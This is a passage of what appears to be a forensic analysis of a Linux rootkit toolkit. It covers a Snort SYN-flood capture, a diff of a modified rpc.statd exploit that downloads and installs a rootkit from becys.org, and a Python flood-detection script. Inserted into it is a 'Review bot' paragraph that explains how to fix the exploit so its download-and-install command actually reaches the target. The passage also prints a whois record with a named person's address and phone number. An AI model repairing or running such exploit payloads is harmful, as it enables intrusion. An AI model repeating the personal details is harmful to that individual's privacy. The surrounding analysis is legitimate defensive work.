03/11-00:38:28.550966 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36
252.3.141.122:31428 -> 192.168.254.32:11 TCP TTL:30 TOS:0x0 ID:30732 IpLen:20 DgmLen:40
******S* Seq: 0x4BC15404  Ack: 0x0  Win: 0xFFFF  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
----------------------------------------------------------------------

Every forged SYN carries the same TTL (30) and window (0xFFFF) regardless of its supposed source, while the target's genuine RST/ACK replies carry TTL 128; this uniformity across unrelated "sources" is the usual sign that one packet generator is forging them. Note also that the target answers every SYN with a RST/ACK because nothing listens on the attacked ports; a listening service would instead keep a half-open connection for each spoofed SYN, which is what makes the flood effective.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

4. Is this tool a worm, or would you classify it as something else?

No, this tool is not a worm. The defining feature of a worm is that it copies itself to the compromised machine and propagates from there; this tool instead fetches a rootkit from a web site, installs it and alerts the intruder. It could be used to build up a large base of hosts on which to install DDoS tools. I would classify this tool as an A.S.E.I.T (automated scan, exploit and install toolkit :-)) ).

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

5. Is this tool original, or is it simply based on previous tools?
If based on previous tools, which ones and what is modified?

From the files contained in the package LUCKROOT.TAR, the script luckgo and the scanner luckscan-a appear to have been developed by the intruder who has been using them (becys); the exploit luckstatdx is based on the exploit statdx.c coded by ron1n. Below is shown the diff between the two files; we can note that only the command that will be executed and some of the strings printed by the tool were modified. The original exploit is included in this same directory.

----------------------------------------------------------------------
mjabbur@uakti:~/honeynet$ diff statdx.c luckroot/luckstatdx.c
162c162
< fprintf(stderr, "statdx by ron1n \n");
---
> fprintf(stderr, "statdx modify by becys \n");
187c187
<
---
> // Becys was modify herre some cmd.
189,190c189,190
< send(sockd, "cd /; ls -alF; id;\n", 19, 0);
<
---
> send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0);
> // Aici cred ca trebuie un exit.
250c250
< printf("OMG! You now have rpc.statd technique!@#$!\n");
---
> printf("You now have a new server rooted with rpc.statd technique and becys|ReSpEkT scan-h4x0r !\n");
498c498
< printf("A timeout was expected. Attempting connection to shell..\n");
---
> printf("Hmm,maibe i can root it. Attempting connection to shell..\n");
500c500
< printf("Failed\n");
---
> printf("Fucking shit,i cant,sorry.\n");
512d511
<
----------------------------------------------------------------------

The comment added at line 190, "Aici cred ca trebuie un exit.", is Romanian for "I think an exit is needed here".

The files contained in the rootkit (xzibit.tar.gz) installed by this toolkit, with the exception of the script install, are based on tools that can be found on the Internet; for example, the trojaned versions of the system binaries ps, netstat, ifconfig and top and the sniffer linsniffer are the files contained in lrk4 (Linux Rootkit version 4).
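Review bot: in the hunk 189,190c189,190 the command string passed to send() was replaced by one well over a hundred bytes long, but the length argument is still 19, so as this source is written the exploit transmits only the first 19 bytes, "cd /; uname -a; id;", without even the terminating newline; the wget, tar, ./install and rm commands never reach the shell on the target, and the rootkit installation this report attributes to the exploit would have to be typed by the intruder by hand after the shell is obtained. The fix is to let the length follow the string, e.g. put the command in `const char cmd[] = "cd /; uname -a; id; wget ...";` and call `send(sockd, cmd, sizeof(cmd) - 1, 0);` (or strlen(cmd)). The comment "Aici cred ca trebuie un exit." added in the same hunk is Romanian for "I think an exit is needed here".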
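Returning to the sl2 capture shown under question 3, the claims made about it (randomized sources, incrementing ports, one RST/ACK per SYN) can be checked mechanically. The following is an added example written for this report, not one of the tools analysed; the embedded log is a constructed excerpt copied from the first records of that capture, and the parser reads Snort's verbose packet-dump layout as printed there.

```python
"""Parse Snort's text packet dump and test the SYN-flood claims made about sl2.

Added example for this report (not one of the rootkit's tools). SNORT_LOG is a
constructed excerpt copied from the sl2 capture under question 3. The summary
checks what the analysis states (sources vary per packet, destination ports
are consecutive, the target answers each SYN with RST/ACK) and also reports
what every SYN has in common (TTL, window): identical values across unrelated
"sources" are the usual sign of a single packet generator forging them.
"""
import re

SNORT_LOG = """\
03/11-00:38:28.548709 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36
13.78.227.187:12978 -> 192.168.254.32:1 TCP TTL:30 TOS:0x0 ID:65081 IpLen:20 DgmLen:40
******S* Seq: 0x37AB17AB  Ack: 0x0  Win: 0xFFFF  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.548721 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36
56.139.190.165:2274 -> 192.168.254.32:0 TCP TTL:30 TOS:0x0 ID:21459 IpLen:20 DgmLen:40
******S* Seq: 0x2B659215  Ack: 0x0  Win: 0xFFFF  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.548909 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36
61.249.122.180:38310 -> 192.168.254.32:2 TCP TTL:30 TOS:0x0 ID:5782 IpLen:20 DgmLen:40
******S* Seq: 0x185AC415  Ack: 0x0  Win: 0xFFFF  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.548954 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C
192.168.254.32:1 -> 13.78.227.187:12978 TCP TTL:128 TOS:0x0 ID:61812 IpLen:20 DgmLen:40
***A*R** Seq: 0x0  Ack: 0x37AB17AC  Win: 0x0  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.549188 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36
12.240.167.89:21997 -> 192.168.254.32:3 TCP TTL:30 TOS:0x0 ID:39765 IpLen:20 DgmLen:40
******S* Seq: 0x753FF080  Ack: 0x0  Win: 0xFFFF  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.549089 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C
192.168.254.32:0 -> 56.139.190.165:2274 TCP TTL:128 TOS:0x0 ID:62068 IpLen:20 DgmLen:40
***A*R** Seq: 0x0  Ack: 0x2B659216  Win: 0x0  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
"""

HDR_RE = re.compile(r"^(\d\d/\d\d-\d\d:\d\d:\d\d\.\d+) ")
IP_RE = re.compile(r"^([\d.]+):(\d+) -> ([\d.]+):(\d+) TCP TTL:(\d+) .*ID:(\d+)")
TCP_RE = re.compile(r"^([*12UAPRSF]{8}) Seq: 0x([0-9A-Fa-f]+)\s+Ack: 0x([0-9A-Fa-f]+)\s+Win: 0x([0-9A-Fa-f]+)")


def parse_snort(text):
    """Return one dict per packet record: timestamp, endpoints, ttl, flags, seq/ack/win."""
    packets, cur = [], None
    for line in text.splitlines():
        m = HDR_RE.match(line)
        if m:                                   # first line of a record: timestamp + MACs
            cur = {"ts": m.group(1)}
            continue
        if cur is None:
            continue
        m = IP_RE.match(line)
        if m:                                   # IP line
            cur.update(src=m.group(1), sport=int(m.group(2)), dst=m.group(3),
                       dport=int(m.group(4)), ttl=int(m.group(5)), ipid=int(m.group(6)))
            continue
        m = TCP_RE.match(line)
        if m:                                   # TCP line: flag string is 12UAPRSF positions
            cur["flags"] = {c for c in m.group(1) if c != "*"}
            cur["seq"], cur["ack"], cur["win"] = (int(m.group(i), 16) for i in (2, 3, 4))
            packets.append(cur)
            cur = None
    return packets


def syn_flood_summary(packets, target):
    """Characterise SYN traffic aimed at `target` and the target's RST/ACK replies."""
    syns = [p for p in packets if p["dst"] == target and p["flags"] == {"S"}]
    rsts = [p for p in packets if p["src"] == target and p["flags"] == {"A", "R"}]
    ports = sorted(p["dport"] for p in syns)
    syn_seqs = {p["seq"] for p in syns}
    return {
        "syn_count": len(syns),
        "distinct_sources": len({p["src"] for p in syns}),
        "ports_contiguous": bool(ports) and ports == list(range(ports[0], ports[-1] + 1)),
        "port_range": (ports[0], ports[-1]) if ports else None,
        "syn_ttls": sorted({p["ttl"] for p in syns}),      # one value => one generator
        "syn_windows": sorted({p["win"] for p in syns}),
        "rst_replies": len(rsts),
        # a reply belongs to a SYN when its ack equals that SYN's seq + 1
        "rst_matched_to_syn": sum(1 for p in rsts if p["ack"] - 1 in syn_seqs),
    }


if __name__ == "__main__":
    summary = syn_flood_summary(parse_snort(SNORT_LOG), "192.168.254.32")
    for key, value in summary.items():
        print(f"{key:>20}: {value}")
```

On the excerpt this reports four SYNs from four different sources against the contiguous port range 0-3, all with TTL 30 and window 0xFFFF, and two RST/ACK replies each matched to its SYN by acknowledgement number. Fed a whole Snort -v log of the flood (or of any suspected SYN flood), the same summary distinguishes spoofed floods from a genuine burst of clients, whose TTLs and windows vary with their operating systems and network distance.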
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

6. What information can you obtain about who is using or created the tool?

In the files luckgo and luckstatdx.c references are made to a person using the handle "becys", to a domain named becys.org and to the mailbox becys@becys.org; the rootkit installed by the exploit luckstatdx is also copied from the host http://www.becys.org. The whois information about this domain is shown below:

----------------------------------------------------------------------
mjabbur@uakti:~/honeynet$ whois becys.org

Whois Server Version 1.3

Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Domain Name: BECYS.ORG
   Registrar: BULKREGISTER.COM, INC.
   Whois Server: whois.bulkregister.com
   Referral URL: www.bulkregister.com
   Name Server: NS.WEBSITESOURCE.COM
   Name Server: NS2.WEBSITESOURCE.COM
   Updated Date: 11-sep-2000

>>> Last update of whois database: Mon, 12 Mar 2001 08:27:36 EST <<<

The Registry database contains ONLY .COM, .NET, .ORG, .EDU domains and
Registrars.

Found InterNIC referral to whois.bulkregister.com.

bSoft
1 Hensel Dr. Apt.#Z1F
College Station, Texas 77840
US

Domain Name: BECYS.ORG

Administrative Contact:
   Qian Wang  becys@yahoo.com
   bSoft
   1 Hensel Dr. Apt.#Z1F
   College Station, Texas 77840
   US
   Phone- (979)862-9233
   Fax-

Technical Contact:
   Web Site Source, In  info@websitesource.com
   Web Site Source, Inc.
   2476 Bolsover, Suite 484
   Houston, TX 77005-2518
   US
   Phone- 713-667-2520
   Fax- 800-863-6499

Record updated on 2000-09-11 00:00:00.
Record created on 2000-09-11.
Record expires on 2002-09-11.
Database last updated on 2001-03-12 23:46:48 EST.
Domain servers in listed order:

NS.WEBSITESOURCE.COM    216.147.43.135
NS2.WEBSITESOURCE.COM   216.147.1.116
----------------------------------------------------------------------

The technical contact for this domain is the company Web Site Source, which provides web hosting services in the Houston, TX area; it appears that this is simply a service provided by the company and that it has nothing else to do with the domain. The administrative contact has the e-mail address becys@yahoo.com; the user name is the same as the domain and the mailbox referenced in the tools, which leads us to think that this is the person we are looking for.

At the beginning of March I visited the web site at http://www.becys.org and did not find any information that could give more details about the attacker. On March 14 the web site showed a new message saying "This account has been disabled. To have the account restored, Contact Customer Service"; this can mean one of two things: either the attacker shut the web site down, or the company Web Site Source did so. The best thing to do, if further investigation is needed, is to try to locate the administrative contact listed in the whois information and to contact the ISP hosting the site.